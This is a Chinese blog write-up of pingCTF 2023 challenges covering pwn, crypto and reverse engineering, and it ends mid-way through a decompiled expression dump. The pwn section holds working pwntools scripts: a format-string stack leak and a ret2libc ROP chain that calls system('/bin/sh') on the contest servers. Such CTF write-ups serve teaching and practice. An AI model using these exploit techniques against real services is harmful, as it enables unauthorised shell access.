[pingCTF 2023] 闲来无事作个题

于 2023-12-30 23:47:37 发布
阅读量1k 收藏 18
点赞数 21
文章标签: pingCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/135310350
版权

谁元旦还打CTF啊,这两周没有比赛,明天才加班,作个已经过去的比赛。好在已经有官方WP,不会的可以看。

PWN

without-love-it-cannot-be-seen

这个没有代码属于瞎pwn,随便输入个东西会提示密码不正确,然后输入%p%p会有地址泄露,说明在格式化字符串漏洞。于是爆破一下看栈里都有啥。

for i in range(200):
    p = remote('without-love-it-cannot-be-seen.knping.pl', 30001)
    p.sendlineafter(b'> ',f'%{i+1}$p'.encode())
    v = p.recvuntil(b' is not', drop=True)
    print(i+1, v, end=' ')
    if v[:2] == b'0x':
        print(p64(int(v,16)))
    else:
        print('')
    p.close()

发现有个可疑值,一般情况下偏移是6,那栈里只有这个0x7866...不清楚是干什么的。

6 b'(nil)'
7 b'0x7866deafdeaf6687'  <----  ?????
8 b'0x2073692070243825'  b'%8$p is not the  correct answer!'
9 b'0x2065687420746f6e'
10 b'0x74636572726f6320'
11 b'0x21726577736e6120'
12 b'(nil)'
13 b'(nil)'
14 b'(nil)'
15 b'(nil)'
16 b'(nil)'
17 b'(nil)'
18 b'(nil)'
19 b'(nil)'
20 b'(nil)'
21 b'(nil)'
22 b'(nil)'
23 b'(nil)'
24 b'0x1'
25 b'0x7fad0ea031ca'    <-- libc_start_main_ret libc6_2.36-9+deb12u3_amd64

 输入这个值(转10进制)得到flag

┌──(kali㉿kali)-[~/ctf/1223]
└─$ nc without-love-it-cannot-be-seen.knping.pl 30001
How deep is your love?
> 8675866579112519303
Exactly!
ping{f0rm47_s7r1ngs_4r3_0bv10us_3v3n_wh3n_y0ur3_8l1nd}

dangle-me

一个有菜单的题,但不是堆。

  while ( 1 )
  {
    v3 = 48;
    __isoc99_scanf(" %c", &v3);
    switch ( v3 )
    {
      case '1':
        printf("My name is %s, dear\n", a1);
        goto LABEL_8;
      case '2':
        puts(&s);
        self_23d6(a1);
        return v5 - __readfsqword(0x28u);
      case '3':
        v1 = get_rand(&unk_51A0);
        puts(off_5120[v1 % 5uLL]);
        goto LABEL_8;
      case '4':
        fwrite("Hmph! In that case, choose someone better: ", 1uLL, 0x2BuLL, stdout);
        getchar();
        fgets(a1, 258, stdin);
        v4 = strrchr(a1, 10);
        if ( v4 )
          *v4 = 0;
        goto LABEL_8;
      case '5':
        return v5 - __readfsqword(0x28u);
      default:
LABEL_8:
        printf("> ");
        break;
    }

菜单2会调用自己,这样栈会抬升0x70,而且a1这个值在很低处,计算一下需要436才会把a1包含在栈中,而菜单4会写a1并且长度足够大。

在抬栈的过程中,会有输出带出一些地址,大部分是栈地址,中间有一部分是_IO_2_1_stdin_通过这个输出可以得到libc地址,伏兵在436次后写到return

这里用的libc不是常见的ubuntu的包是libc6_2.36-9+deb12u3_amd64.so 看来是外国常见包。

from pwn import *

libc = ELF('./libc6_2.36-9+deb12u3_amd64.so')
context(arch='amd64', log_level='debug')

#p = process('./dangle')
p = remote('dangle-me.knping.pl', 30000)

for i in range(436):
    p.sendline(b'2')

p.sendline(b'4')

msg = p.recvuntil(b'Hmph!')
for i in range(12):
    if not b'\x7f' in msg: break
    v = msg.index(b'\x7f')
    v1 = msg[v-5:v+1]
    print(v1)
    msg = msg[v+1:]
   
libc.address = u64(v1.ljust(8, b'\x00')) - libc.sym['_IO_2_1_stdin_']
print(f"{libc.address = :x}")

pop_rdi = next(libc.search(asm('pop rdi;ret')))
bin_sh = next(libc.search(b'/bin/sh\x00'))
system = libc.sym['system']

p.sendlineafter(b"In that case, choose someone better: ", flat(0, pop_rdi+1, pop_rdi+1, pop_rdi+1, pop_rdi, bin_sh, system))
p.sendline(b'5')
p.interactive()
#ping{h0w_t0_r37urn_an_array_fr0m_a_func710n_in_C++?!}

第3题实在看不懂,现在pwn都成rev了,c++写的堆,真复杂

Crypto

ancient-genius

给一了个石碑,碑上有字,弄下来QQ可以识别,搜一下是斐波那契函数的某一项。猜这项号就是flag的ascii码值。

c = [114059301025943970552219,3928413764606871165730,43566776258854844738105,1500520536206896083277,22698374052006863956975682,781774079430987230203437,573147844013817084101, 483162952612010163284885,781774079430987230203437, 70492524767089125814114,3311648143516982017180081, 83621143489848422977,31940434634990099905,927372692193078999176,16641027750620563662096,83621143489848422977,1500520536206896083277,83621143489848422977,59425114757512643212875125]

fib = [1,1]
for i in range(128):
    fib.append(sum(fib[-2:]))

m = [fib.index(i)+1 for i in c]
bytes(m)
#ping{testowa_flaga}

private-conversation

给了一堆大小写的xd猜是大小写代表01

b = ''.join(['1' if i in 'XD' else '0' for i in a])
c = ''.join([chr(int(b[i:i+8],2)) for i in range(0, len(b),8)])

转出来是段程序,直接bytes就是flag

#include <stdio.h>
int main() { 
    int m[] = { 112, 105, 110, 103, 123, 119, 104, 121, 95, 115, 111, 95, 115, 101, 114, 105, 111, 117, 115, 95, 88, 68, 125 }; 
    const int len_m = sizeof((m)) / sizeof((m[0])); 
    char c[len_m]; 
    for (int i = 0; (i < len_m) & !!(i < len_m); ++i) { 
        c[i] = (char)(m[i]); 
    }; 
    for (int j = 0; (j < len_m) & !!(j < len_m); ++j) {
        putchar(c[j]); 
    }; 
    putchar('\\n'); 
    return 0; 
};

old-friend-from-the-past

这题有点绕,有个提示是个卡通人物,外国人都长差不多,跟密码有关的猜是凯撒(因为古典密码就知道这一个)

给的数据包含大于127的值,爆破一下偏移,发现在70,79的位置有可疑值。

#数字符号+79
>>> ''.join([chr((i+79)&0xff) for i in a])
'yrwp{enwr_ermr_erlr_15/03/44_KL}'
#字符+70
>>> ''.join([chr((i+70)&0xff) for i in a])
"pingr\\eniV\\idiV\\iciV(,&'*&++VBCt"

因为凯撒是字母循环移位,所以可能只破坏了内容。不过从这两个看79得到的15/03/44是正确的。后边的ping,BC也是正确的,所以拿到随波上一键一下。

key1 #9: ping{veni_vidi_vici_15/03/44_BC}

hard-work

给了一堆数,拿给厨子看。

 

lame-lame-loser

给了x,y求a,b

assert x*a + y*b == 0

显然a/b=-y/x直接用连分式求第512项

#-y/x = a/b 
x = -x 
c = continued_fraction(y/x)
a = c.numerator(512)
b = c.denominator(512)
aes = AES.new(sha256(f'{a}||{b}'.encode()).digest(), AES.MODE_CBC, iv=bytes(16))
aes.decrypt(ct)
b'ping{135str4_135str4_107v4sz_41g0r1thm_r0cks_sc41ing}\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b'

 easy-rsa

给了p&q和p&(q<<1)来分解

from Crypto.Util.number import getPrime
from Crypto.Util.number import bytes_to_long

p = getPrime(2048)
q = getPrime(2048)
n = p * q
e = 65537
d = pow(e, -1, (p-1)*(q-1))
flag = open("flag.txt","rb").read()

print(f"q & p = {q & p}")
print(f"q & (p << 1) = {q & (p << 1)}")
print(f"n = {n}")
print(f"ct = {pow(bytes_to_long(flag), e, n)}")

爆破一下(虽然搜到用z3的但是复现没成功,还是自己爆破更方便)

sp,sq = ['*']*2048, ['*']*2048
v1 = bin(hint1)[2:].rjust(2048,'0')
v2 = bin(hint2)[2:].rjust(2048,'0')

#hint1 当i位为1时p,q都是1
for i in range(2048):
    if v1[i] == '1':
        sp[i] = sq[i] = '1'

#hint2 当i位为1时p,q+1(串下一位)为1
for i in range(2047):
    if v2[i] == '1':
        sp[i] = '1' 
        sq[i+1] = '1'

#如果hint1为0且q[i]为1则p[i]为0
for i in range(2047): 
    if v1[i] == '0' and sq[i] == '1':
        sp[i] = '0'
    if v2[i] == '0' and sp[i] == '1':
        sq[i+1] = '0' 

queue = [''.join(sp)+''.join(sq)]
while True:
    #print(len(queue))
    tmp = []
    if len(queue)==0:
        break
    for v in queue:
        #修剪
        #print(len(v))
        v0,v1 = v[:2048],v[2048:]
        sv10,sv20 = int(v0.replace('*','0'),2),int(v1.replace('*','0'),2)
        sv11,sv21 = int(v0.replace('*','1'),2),int(v1.replace('*','1'),2)
        if sv10*sv20 == n:
            print(f"p = {sv10}\nq = {sv20}");break
        elif sv10*sv20>n:
            #print('exit 1', hex(sv10),hex(sv20), sv10*sv20)
            continue 
        if sv11*sv21 == n:
            print(f"p = {sv11}\nq = {sv21}");break
        elif sv11*sv21<n:
            #print('exit 2', hex(sv11),hex(sv21), sv11*sv21)
            continue 
        
        for i in range(2048):
            if v0[i] == '*' or v1[i] == '*':
                break 
        else:
            if int(v0,2)*int(v1,2) == n:
                print('p = ', int(v0,2))
                print('q = ', int(v1,2))
                p,q = int(v0,2),int(v1,2)
                print(long_to_bytes(pow(ct,inverse(e,(p-1)*(q-1)),n)))
                tmp = []
                break
            continue  #queue next 
        #print("pos:",i)
        if v0[i] == '*' and v1[i] == '*':
            tmp.append(v0[:i]+'0'+v0[i+1:]+v1[:i]+'0'+v1[i+1:])
            tmp.append(v0[:i]+'0'+v0[i+1:]+v1[:i]+'1'+v1[i+1:])
            tmp.append(v0[:i]+'1'+v0[i+1:]+v1[:i]+'0'+v1[i+1:])
        elif v0[i] == '*':
            tmp.append(v0[:i]+'0'+v0[i+1:]+v1)
            tmp.append(v0[:i]+'1'+v0[i+1:]+v1)
        else:
            tmp.append(v0+v1[:i]+'0'+v1[i+1:])
            tmp.append(v0+v1[:i]+'1'+v1[i+1:])
    queue = tmp

爆破出来,解下RSA

#p = 31414044852860996947346398192704080827872763068694329274119185745613029479035528333554232598283231310566095137226764704917075731383799935776515586265844777813773946852295543402726218641902224785422311606243491480667993899764860043003407319251631200307811139246420848244434497297127317015634454189668717908348206495217498115190364223229458400739908910324859578209742893335839056778035525563166511602128018857154839147727466051233824202845757433679040620809038378983806660286371284178078322695510598701589594072655300137369192244912623132875142160934348472868297941876267796774411586086448879835908911701550744733921087
#q = 20031264712935205421576909728722450859000254939031335947177423899655690963407943703684196824583455780724430510508322444471061102640648385627006448675575550911139961026447682876195769362694106906957742825614700067887842438209095811133022146174646193484025312835425382814981027974302305791824646292068546412405335929744823552696641161835505496009550005563544882690980352348214339664785139718253389610601965973837353663266127169506830895937473045851283979352860361522327409388624637636014786984718193740575250481721203768799684244360057548705869379458130623351549859661059865098634186746444726964522002933623233578518151

long_to_bytes(pow(ct,inverse(e,(p-1)*(q-1)),n))
#ping{RSA_p_and_q_for_the_win!}

scherbius-machine

Our team intercepted an machine from the enemy, but it suffered damage during transport, causing rotor and plugboard disarray. Your mission is to reconstruct the machine configuration, determine the missing plugboard connection, and decrypt the given ciphertext. Key components:

Rotors: BDFHJLCPRTXVZNYEIWGAKMUSQO, AJDKSIRUXBLHWTMCQGZNPYFVOE, EKMFLGDQVZNTOWYHXUSPAIBRCJ Reflector: EJMZALYXVBWFCRQUONTSPIKHGD Partial plugboard image provided. Ciphertext: dvgs{atrpwb_pxr_mwqlqrxsqggc_crsrv_xiwdtyu_fdp}

从名字上看是恩格玛机,这东西不清楚怎么弄,看WP

虽然给了三个轮,但是爆破并不关心这轮的顺序。接线这一共是10组,相同颜色一组,差一个。

至于Reflector 为什么是A 不大清楚

from python_enigma import enigma
import string

rotor_config = [("III", "A"), ("II", "B"), ("I", "C")]

def to_flag_format(pt):
    return f"{pt[0:4]}{{{pt[4:10]}_{pt[10:13]}_{pt[13:25]}_{pt[25:30]}_{pt[30:37]}_{pt[37:40]}}}"

stator_type =  ["military","civilian"][0] 

for a in string.ascii_uppercase:
    for b in string.ascii_uppercase:
        for c in string.ascii_uppercase:
            for p in "EJPQTUY":
                plugs = f"AV BS CG DL F{p} HZ IN KM OW RX" #部分已知
                machine = enigma.Enigma(catalog="default", stecker=plugs,
                                        rotors=rotor_config, reflector="Reflector A", operator=True, word_length=100, stator=stator_type)
                machine.set_wheels(f"{a}{b}{c}")
                ct = "dvgs{atrpwb_pxr_mwqlqrxsqggc_crsrv_xiwdtyu_fdp}"
                pt = machine.parse(ct.upper()).lower()
                if (pt.startswith('ping')):
                    print(f"{to_flag_format(pt)} {a} {b} {c} {p}")

'''
Outputs
ping{enigma_ist_uaszinierend_einen_schonev_jag} E C A J
ping{enigma_ist_uahzpnieyend_einen_schonev_cag} E C A Q
ping{enigma_ist_faszinierend_einen_schonen_tag} E C A U
'''

REV

noodle-nightmare

把程序几个字符几个字符的分开写到include文件里,先恢复成代码

name = open('noodleNightmare.cpp').readlines()

msg = ''
for v in name:
    v = v.strip()
    if v.startswith('#include '):
        fname = v[10:-1]
        print(fname)
        msg += open('./'+fname).read()
    if len(v)<2:
        msg += v

print(msg)

连起来就是下边这样子,不过不用这个直接写python,g++编译后直接运行就行,但直接按偏移找字符怼上还不对。原因不明。 

using namespace std ;
int main() { 
	string _ = "Code that overuses }{ GOTO statements ratherzx than_structured programminjg constructqs, resulting in convoluted and unmaintainable programs, is often called spaghetti code. Such code has a complex and tangled control structure, resulting in a program flow that is conceptually like a bowl of spaghetti, twisted and tangled.";  
	cout << "People always say that my code is spaghetti, but I don't see it. Can you help me find the flag?"  << endl ;
	string ____ ;
	cin >> ____ ;
	string __ = "";  
	for ( int ______ = 0 ;______ < 55 ;++______) {	__ += "a";  } 
	__[ 0 ] = _[ 63 ] ;__[ 1 ] = _[ 71 ] ;__[ 2 ] = _[ 34 ] ;__[ 3 ] = _[ 66 ] ;__[ 4 ] = _[ 20 ] ;__[ 5 ] = _[ 71 ] ;
	__[ 6 ] = _[ 5 ] ;__[ 7 ] = _[ 51 ] ;__[ 8 ] = _[ 71 ] ;__[ 9 ] = _[ 15 ] ;__[ 10 ] = _[ 51 ] ;__[ 11 ] = _[ 128 ] ;__[ 12 ] = _[ 7 ] ;
	__[ 13 ] = _[ 2 ] ;__[ 14 ] = _[ 51 ] ;__[ 15 ] = _[ 255 ] ;__[ 16 ] = _[ 6 ] ;__[ 17 ] = _[ 3 ] ;__[ 18 ] = _[ 34 ] ;__[ 19 ] = _[ 51 ] ;
	__[ 20 ] = _[ 56 ] ;__[ 21 ] = _[ 1 ] ;__[ 22 ] = _[ 2 ] ;__[ 23 ] = _[ 3 ] ;__[ 24 ] = _[ 51 ] ;__[ 25 ] = _[ 71 ] ;__[ 26 ] = _[ 15 ] ;
	__[ 27 ] = _[ 51 ] ;__[ 28 ] = _[ 3 ] ;__[ 29 ] = _[ 7 ] ;__[ 30 ] = _[ 15 ] ;__[ 31 ] = _[ 71 ] ;__[ 32 ] = _[ 3 ] ;__[ 33 ] = _[ 13 ] ;
	__[ 34 ] = _[ 51 ] ;__[ 35 ] = _[ 5 ] ;__[ 36 ] = _[ 1 ] ;__[ 37 ] = _[ 51 ] ;__[ 38 ] = _[ 13 ] ;__[ 39 ] = _[ 3 ] ;__[ 40 ] = _[ 7 ] ;
	__[ 41 ] = _[ 2 ] ;__[ 42 ] = _[ 51 ] ;__[ 43 ] = _[ 71 ] ;__[ 44 ] = _[ 34 ] ;__[ 45 ] = _[ 51 ] ;__[ 46 ] = _[ 7 ] ;__[ 47 ] = _[ 15 ] ;
	__[ 48 ] = _[ 15 ] ;__[ 49 ] = _[ 3 ] ;__[ 50 ] = _[ 32 ] ;__[ 51 ] = _[ 128 ] ;__[ 52 ] = _[ 93 ] ;__[ 53 ] = _[ 276 ] ;__[ 54 ] = _[ 19 ] 
	if ( ____ == __ ) { cout << "Congratulations, you have untangled this spaghetti!"  << endl ;} 
	else { cout << "Not this time!"  << endl ;} 
}

ziggarettes

这个打开就看到了,复制下来处理一下。

a = '''case 0
case 0x20
  if ( v42 != 'p' )
case 1
  if ( v42 != 'i' )
case 2
  if ( v42 != 'n' )
case 3
  if ( v42 != 'g' )
case 4
  if ( v42 != '{' )
case 5
  if ( v42 != 'z' )
case 6
case 9
  if ( v42 != '1' )
case 7
  if ( v42 != 'G' )
case 8
case 0xB
case 0x10
case 0x15
  if ( v42 != '_' )
case 0xA
  if ( v42 != 'S' )
case 0xC
  if ( v42 != 'v' )
case 0xD
case 0x17
  if ( v42 != '3' )
case 0xE
  if ( v42 != 'R' )
case 0xF
  if ( v42 != 'Y' )
case 0x11
  if ( v42 != 'C' )
case 0x12
  if ( v42 != '0' )
case 0x13
case 0x1E
  if ( v42 != 'O' )
case 0x14
case 0x21
  if ( v42 != 'l' )
case 0x16
case 0x1F
  if ( v42 != '2' )
case 0x18
  if ( v42 != '4' )
case 0x19
  if ( v42 == 'm' )
case 0x1A
case 0x1C
  if ( v42 != 'K' )
case 0x1B
case 0x1D
  if ( v42 != 'I' )
case 0x22
  if ( v42 == '}' )
'''
m = ['x']*0x23 
p = []
for i in a.split('\n'):
    if i[:5] == 'case ':
        p.append(int(i[5:],16))
    elif i[:5] == '  if ':
        for j in p:
            m[j] = i.split("'")[1]
        p = []

print(''.join(m))
#ping{z1G_1S_v3RY_C0Ol_234mKIKIO2pl}

hangover

里边代码巨简单,就是有点长,复制出来稍加处理

dword_4052C0 = 0
dword_4052C4 = 1
dword_4052C8 = 2
dword_4052CC = 3
dword_4052D0 = 4

v10 = dword_4052C8 | dword_4052C4
v6 = dword_4052C8 | dword_4052CC
v7 = dword_4052D0 | dword_4052CC
v22 = b"ding{ring_ding_ding_daa_baa_baaaa}"
v19 = [0]*34

v19[0] = (v7 | dword_4052C4 ^ (dword_4052D0 | dword_4052C4 & ~(dword_4052C8 ^ dword_4052C4 & ~((dword_4052C8 ^ (dword_4052D0 | dword_4052C4 & ((dword_4052C8 ^ ((dword_4052D0 | ((v6 | ~(dword_4052CC & (v10 | dword_4052D0 ^ ((dword_4052C4 | v22[0]) >> dword_4052CC)))) << dword_4052D0)) << dword_4052C4)) << dword_4052C8))) >> dword_4052C8)))) << dword_4052D0

v11 = dword_4052D0 ^ dword_4052C4
v8 = dword_4052D0 | dword_4052C4
v19[1] = (dword_4052C4 ^ ((dword_4052D0 | (((dword_4052CC & ~(~(v7 | ((v8 | ~((dword_4052C4 | ((dword_4052C4 & ~((dword_4052C4 & ((v8 | dword_4052C8 ^ (dword_4052C8 | v11 ^ dword_4052CC & ~v22[1]) & dword_4052D0 & dword_4052CC) >> dword_4052D0 << dword_4052C8)) >> dword_4052C4)) >> dword_4052C4)) << dword_4052CC)) >> dword_4052D0)) << dword_4052CC >> dword_4052CC >> dword_4052CC << dword_4052CC)) << dword_4052CC << dword_4052C8) >> dword_4052C4)) << dword_4052C4))

v13 = dword_4052C8 ^ dword_4052CC
v15 = dword_4052C8 & dword_4052CC
v19[2] = (dword_4052D0 | dword_4052C8 ^ (~(v11 ^ (~(dword_4052D0 | ((dword_4052CC | ((dword_4052C8 ^ dword_4052D0 & ~((dword_4052C8 | dword_4052C4 ^ ((dword_4052CC ^ (dword_4052D0 | ((dword_4052D0 ^ v15 & ((v13 ^ (v22[2] >> dword_4052C4)) >> dword_4052C4)) << dword_4052C8))) >> dword_4052C8)) << dword_4052C4 << dword_4052C4)) << dword_4052C8)) << dword_4052CC)) << dword_4052CC << dword_4052C8)) >> dword_4052C8)) >> dword_4052D0

v19[3] = ~((dword_4052C4 | (~(dword_4052CC << dword_4052CC << dword_4052C8) >> dword_4052CC)) << dword_4052CC)
v16 = dword_4052D0 & dword_4052C4

v19[4] = ~(dword_4052D0 ^ ~dword_4052CC & (~(dword_4052C4 & ((v16 & ((dword_4052CC | ((dword_4052C8 | ~(dword_4052CC | ((dword_4052C8 ^ ((dword_4052D0 | dword_4052C4 & ((dword_4052D0 ^ (~(v6 | dword_4052D0 & ~v22[4]) >> dword_4052CC)) << dword_4052C4 << dword_4052C4)) >> dword_4052CC)) >> dword_4052D0))) << dword_4052C4)) >> dword_4052C8)) >> dword_4052C4)) << dword_4052C8 << dword_4052C4 << dword_4052D0))

v19[5] = (dword_4052C8 ^ ((v7 | dword_4052D0 ^ (v6 >> dword_4052D0 >> dword_4052C8)) << dword_4052D0))

v18 = dword_4052C8 & dword_4052C4
v19[6] = ~((dword_4052CC | dword_4052C4 | (~(((dword_4052C8 | ((~(dword_4052CC | (~(dword_4052D0 ^ ((dword_4052C8 | dword_4052C4 & ((dword_4052C8 | ((v18 & ~(dword_4052C8 & dword_4052CC & dword_4052C4)) << dword_4052C4 << dword_4052C8)) << dword_4052CC << dword_4052D0 >> dword_4052C4 >> dword_4052C4)) << dword_4052D0 << dword_4052C4)) >> dword_4052D0 >> dword_4052C4)) << dword_4052C4) >> dword_4052C8 >> dword_4052C4)) << dword_4052C4) >> dword_4052D0) << dword_4052D0)) << dword_4052C4 << dword_4052C4)

v19[7] = (v13 ^ (~(~(dword_4052C8 ^ dword_4052D0 & ~(((dword_4052D0 | dword_4052C8 ^ dword_4052C4 & (((~(dword_4052D0 ^ ((dword_4052CC ^ ((dword_4052C4 | ~(dword_4052CC & (dword_4052C4 | ~(dword_4052CC ^ (v22[7] >> dword_4052CC))))) << dword_4052C4)) >> dword_4052D0)) >> dword_4052C4 << dword_4052D0) & dword_4052CC & dword_4052C4) >> dword_4052C8)) << dword_4052C4) >> dword_4052CC)) << dword_4052C8) << dword_4052C8))

v12 = dword_4052C8 ^ dword_4052C4
v19[8] = (dword_4052CC | ((dword_4052C4 ^ ((dword_4052CC ^ (dword_4052C8 | ((dword_4052C4 & (v13 ^ (dword_4052C4 | (~(dword_4052C8 ^ ((dword_4052D0 ^ (~(v12 >> dword_4052CC) << dword_4052D0)) << dword_4052C8)) >> dword_4052CC)))) >> dword_4052D0))) << dword_4052C4)) << dword_4052D0)) 

v19[9] = ~((dword_4052C8 | ((dword_4052D0 | (~(dword_4052D0 ^ (v7 | dword_4052C8 & (~(dword_4052C8 | ((dword_4052D0 & (dword_4052C4 ^ (dword_4052D0 | ((dword_4052C4 & ((dword_4052C8 ^ dword_4052D0 & ((dword_4052D0 ^ ((dword_4052CC & (dword_4052C4 | ~(dword_4052CC | v22[9]))) >> dword_4052CC)) << dword_4052D0)) << dword_4052C4)) << dword_4052C4)))) >> dword_4052D0)) >> dword_4052C4 << dword_4052CC))) << dword_4052CC)) << dword_4052C8)) << dword_4052C4) >> dword_4052C4 

v17 = ~dword_4052D0
v19[10] = (dword_4052C8 | ((dword_4052D0 | (((dword_4052C8 & ~(dword_4052D0 | dword_4052C8 & (dword_4052C4 | ((dword_4052D0 & (dword_4052CC | ~(v10 | ((dword_4052CC | (((dword_4052CC | (~dword_4052CC >> dword_4052CC)) & dword_4052C8 & v17) << dword_4052C4)) >> dword_4052C8)))) >> dword_4052D0 >> dword_4052D0)))) << dword_4052D0) >> dword_4052D0)) << dword_4052D0)) 

v19[11] = (dword_4052CC ^ ((dword_4052CC ^ ((dword_4052CC ^ ((dword_4052CC & ((dword_4052C8 | ((dword_4052C4 ^ (((dword_4052C8 ^ ((dword_4052C8 & ((dword_4052D0 & ((dword_4052CC & ~((dword_4052C4 ^ dword_4052D0 & ~v22[11]) >> dword_4052D0)) << dword_4052D0)) >> dword_4052D0)) >> dword_4052C4 >> dword_4052C8 << dword_4052D0)) << dword_4052CC) >> dword_4052C4)) << dword_4052C4)) >> dword_4052C4)) >> dword_4052C8 << dword_4052C8)) << dword_4052D0)) >> dword_4052D0 << dword_4052D0)) 

v19[12] = (dword_4052C8 ^ ((dword_4052CC ^ ((dword_4052C8 | ~((dword_4052CC ^ (dword_4052C4 | ((~(dword_4052C8 ^ (dword_4052C4 | dword_4052CC & (~(dword_4052C4 & (dword_4052CC ^ (dword_4052C8 | ~(dword_4052CC ^ ((dword_4052C4 & ((v18 & (dword_4052C8 | (v22[12] << dword_4052C8))) << dword_4052C4)) >> dword_4052C4))))) >> dword_4052C4 << dword_4052C4))) << dword_4052CC) >> dword_4052C8))) >> dword_4052C4)) << dword_4052C4)) << dword_4052D0))

v19[13] = ~((dword_4052D0 | ~(v13 ^ (dword_4052C4 | dword_4052C8 & ~(dword_4052D0 ^ (dword_4052D0 >> dword_4052CC) & dword_4052C8 & dword_4052D0)))) << dword_4052C8 << dword_4052D0 >> dword_4052C4)

v19[14] = (dword_4052D0 ^ dword_4052CC ^ ((dword_4052C4 | ((dword_4052C8 ^ dword_4052D0 & ~dword_4052CC) << dword_4052C8 >> dword_4052CC)) << dword_4052D0))

v19[15] = ~(~(dword_4052C8 ^ (~((dword_4052CC | (((dword_4052D0 ^ ((~(dword_4052C4 & ((dword_4052C4 | (v22[15] >> dword_4052D0)) >> dword_4052C8)) << dword_4052C4) >> dword_4052C4 >> dword_4052CC)) << dword_4052C4 << dword_4052C4 << dword_4052D0) >> dword_4052C8 << dword_4052D0 >> dword_4052D0)) << dword_4052C8 << dword_4052C4) >> dword_4052CC >> dword_4052C4 >> dword_4052D0 << dword_4052D0 >> dword_4052CC)) << dword_4052CC) >> dword_4052CC << dword_4052CC
 
v19[16] = ~(~(dword_4052CC ^ (dword_4052C8 | ((dword_4052C8 & ~((dword_4052C8 ^ (dword_4052C8 >> dword_4052CC)) << dword_4052C8)) << dword_4052C4))) << dword_4052D0)

v19[17] = (dword_4052C4 | ((dword_4052CC | ((dword_4052D0 ^ (dword_4052CC | dword_4052C4 & ((dword_4052D0 ^ ((dword_4052C4 & (dword_4052CC ^ dword_4052D0 & ~(dword_4052CC | ((dword_4052C8 | dword_4052C4 ^ (~(dword_4052CC & (v12 ^ v22[17])) << dword_4052CC)) << dword_4052D0)))) << dword_4052CC >> dword_4052C8)) << dword_4052CC))) >> dword_4052D0)) << dword_4052C8)) << dword_4052CC

v19[18] = (dword_4052C4 ^ ((dword_4052C4 ^ dword_4052CC & (dword_4052C8 | ((dword_4052CC & ~dword_4052C8) << dword_4052D0))) << dword_4052D0))

v19[19] = (dword_4052D0 ^ ((dword_4052D0 | dword_4052CC ^ dword_4052C4) << dword_4052D0))
v19[20] = (dword_4052CC ^ ((dword_4052D0 | dword_4052C8 & ~(dword_4052C4 & ((dword_4052CC | dword_4052D0 ^ (v10 | ~(dword_4052C8 & ((dword_4052CC | dword_4052C4 ^ ((dword_4052D0 & (~(v10 | (~(dword_4052D0 & (v11 ^ (dword_4052C4 | dword_4052C8 ^ ((dword_4052D0 & (v22[20] >> dword_4052CC)) << dword_4052C8)))) << dword_4052CC)) << dword_4052D0)) >> dword_4052C8)) << dword_4052C4 << dword_4052C8)))) << dword_4052CC))) << dword_4052CC))

v19[21] = (dword_4052D0 | ~((dword_4052C8 ^ (~((dword_4052D0 | ~((dword_4052C8 | ~(dword_4052D0 ^ dword_4052C4 & ((dword_4052D0 | v12 ^ v17) >> dword_4052CC))) << dword_4052CC)) << dword_4052CC) >> dword_4052CC << dword_4052C4 << dword_4052CC)) >> dword_4052D0 << dword_4052D0)) >> dword_4052CC

v19[22] = (dword_4052D0 | dword_4052C4 ^ ((dword_4052CC | ((dword_4052C8 ^ dword_4052C4 & ~(dword_4052C8 | ((v8 | (~(v12 ^ (((dword_4052C8 & ((dword_4052C4 & ~(dword_4052C8 | dword_4052C4 ^ (dword_4052C8 | ((~dword_4052C8 & (dword_4052C4 ^ ((dword_4052D0 & (~(dword_4052D0 >> dword_4052C8) << dword_4052CC)) >> dword_4052C4))) >> dword_4052CC >> dword_4052CC)))) >> dword_4052C4)) << dword_4052D0) >> dword_4052D0)) << dword_4052CC >> dword_4052CC)) >> dword_4052C4))) << dword_4052C4)) << dword_4052D0))

v9 = dword_4052C4 & (v13 ^ v15 & ~(dword_4052C8 | ((dword_4052CC ^ (((v8 | dword_4052CC & (~((dword_4052C4 & (dword_4052CC ^ (dword_4052D0 | ((dword_4052C4 & (dword_4052CC | ((dword_4052CC & (v12 ^ ((dword_4052C4 ^ (~v22[23] >> dword_4052C4 << dword_4052C8)) >> dword_4052C8))) >> dword_4052D0))) >> dword_4052CC)))) >> dword_4052CC) << dword_4052CC << dword_4052C4)) << dword_4052CC) >> dword_4052C8)) >> dword_4052C8)))

v14 = dword_4052C8 | dword_4052D0
v19[23] = (dword_4052C8 ^ ((v14 | v9) << dword_4052D0))

v19[24] = ~(dword_4052C4 | ((dword_4052C8 | ((dword_4052C4 | ~(dword_4052C8 ^ dword_4052D0 ^ (dword_4052C4 | dword_4052D0 ^ dword_4052CC & (dword_4052C4 ^ (dword_4052CC | ((dword_4052C4 & (v6 | ((dword_4052CC & ((dword_4052C4 & ((dword_4052CC | (~(~(dword_4052C8 ^ dword_4052D0 ^ ((dword_4052D0 ^ (dword_4052C8 | v22[24])) >> dword_4052CC >> dword_4052D0)) << dword_4052C8) << dword_4052C4)) << dword_4052C4 << dword_4052C8)) << dword_4052C4 << dword_4052D0)) >> dword_4052D0 >> dword_4052CC))) << dword_4052C4 << dword_4052C8)))))) << dword_4052CC)) << dword_4052CC << dword_4052C8)) << dword_4052C8 >> dword_4052CC

v19[25] = ~(v12 ^ ((dword_4052C4 | dword_4052C8 ^ (~(dword_4052CC & (dword_4052C4 | ((dword_4052CC | ((dword_4052C8 & ((dword_4052D0 ^ dword_4052C4 & ~((dword_4052C4 ^ (dword_4052D0 | dword_4052C8 ^ ((dword_4052C4 ^ (dword_4052D0 | dword_4052C4 & (dword_4052D0 ^ dword_4052CC & ((dword_4052C4 & (~v22[25] >> dword_4052CC >> dword_4052D0)) >> dword_4052C8)))) << dword_4052C8))) << dword_4052C4 << dword_4052C8)) << dword_4052CC << dword_4052D0 << dword_4052CC)) >> dword_4052C8)) >> dword_4052C8 << dword_4052CC))) << dword_4052CC)) << dword_4052C4 << dword_4052C8))

v19[26] = (dword_4052CC | ((dword_4052CC | dword_4052C4 & ~(dword_4052C8 ^ (v10 << dword_4052C4))) << dword_4052D0))

